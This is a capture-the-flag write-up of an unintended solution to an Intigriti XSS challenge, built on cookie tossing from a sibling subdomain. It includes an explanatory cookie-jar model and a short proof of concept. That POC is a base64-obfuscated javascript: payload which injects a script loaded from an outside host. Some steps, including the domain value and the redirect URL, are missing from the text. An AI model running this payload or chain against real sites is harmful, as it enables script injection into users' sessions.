Inti XSS unintended solution

Unintended way to solve the challenge

Two things you need to know (gotchas):

  • Any subdomain can set a cookie for all subdomains of its parent domain.
  • If two cookies with the same name exist, the cookie with the closest (most specific) path is preferred.
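
The two gotchas above, modelled as an added example (not code from the original write-up): a simplified RFC 6265 cookie jar showing why a first-match reader picks up a cookie set by a sibling subdomain, and how the `__Host-` prefix rejects it. The hostnames, values and function names are constructed placeholders; the public-suffix check and default-path derivation are left out.

```javascript
// Simplified model of RFC 6265 storage/retrieval (assumption: no public-suffix
// list, and a missing Path attribute defaults to "/").
const domainMatch = (host, domain) => host === domain || host.endsWith("." + domain);
const pathMatch = (reqPath, cPath) =>
  reqPath === cPath ||
  (reqPath.startsWith(cPath) && (cPath.endsWith("/") || reqPath[cPath.length] === "/"));
let clock = 0; // stands in for cookie creation time

// Returns true if the browser would store the cookie set by `originHost`.
function setCookie(jar, originHost, { name, value, domain, path = "/", secure = false }) {
  // __Host- prefix: must be Secure, Path=/, and carry no Domain attribute.
  if (name.startsWith("__Host-") && (!secure || path !== "/" || domain)) return false;
  // A Domain attribute is accepted only if the setting host falls under it.
  if (domain && !domainMatch(originHost, domain)) return false;
  const scope = domain || originHost;
  const i = jar.findIndex(c => c.name === name && c.scope === scope && c.path === path);
  if (i >= 0) jar.splice(i, 1); // same name + domain + path replaces the old entry
  jar.push({ name, value, scope, hostOnly: !domain, path, created: clock++ });
  return true;
}

// Builds the Cookie header for a request: longer paths first, then older first.
function cookieHeader(jar, host, reqPath) {
  return jar
    .filter(c => (c.hostOnly ? host === c.scope : domainMatch(host, c.scope)))
    .filter(c => pathMatch(reqPath, c.path))
    .sort((a, b) => b.path.length - a.path.length || a.created - b.created)
    .map(c => `${c.name}=${c.value}`)
    .join("; ");
}

// First-match reader, the way much application code parses cookies.
function readCookie(header, name) {
  for (const part of header.split("; ")) {
    const eq = part.indexOf("=");
    if (part.slice(0, eq) === name) return part.slice(eq + 1);
  }
  return null;
}

// Constructed scenario: app.example.test is the target, old.example.test a sibling.
function demo() {
  const jar = [];
  setCookie(jar, "app.example.test", { name: "username", value: "alice" });
  setCookie(jar, "old.example.test", { name: "username", value: "tossed",
    domain: "example.test", path: "/challenge/cooking.html" });
  const header = cookieHeader(jar, "app.example.test", "/challenge/cooking.html");
  const hardened = setCookie(jar, "old.example.test", { name: "__Host-username",
    value: "tossed", domain: "example.test", secure: true });
  return { header, seen: readCookie(header, "username"), hardened };
}
```

Naming the cookie `__Host-username` keeps a sibling subdomain from setting a parent-domain copy, since the prefix forbids the Domain attribute.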


  1. Using any previous XSS on Intigriti challenges, create a cookie named username, set its domain attribute as and path attribute as /challenge/cooking.html

  2. Redirect to

POC code:

	<!DOCTYPE html>
	      location = ";vascript:eval(atob(`eD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTt4LnNyYz0iaHR0cHM6Ly9jeWJlcnBvc3NpYmxlYXhpcy5jeXBoM3IxMzM3LnJlcGwuY28vc2NyaXB0LmpzIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==`));//%0aid=origin";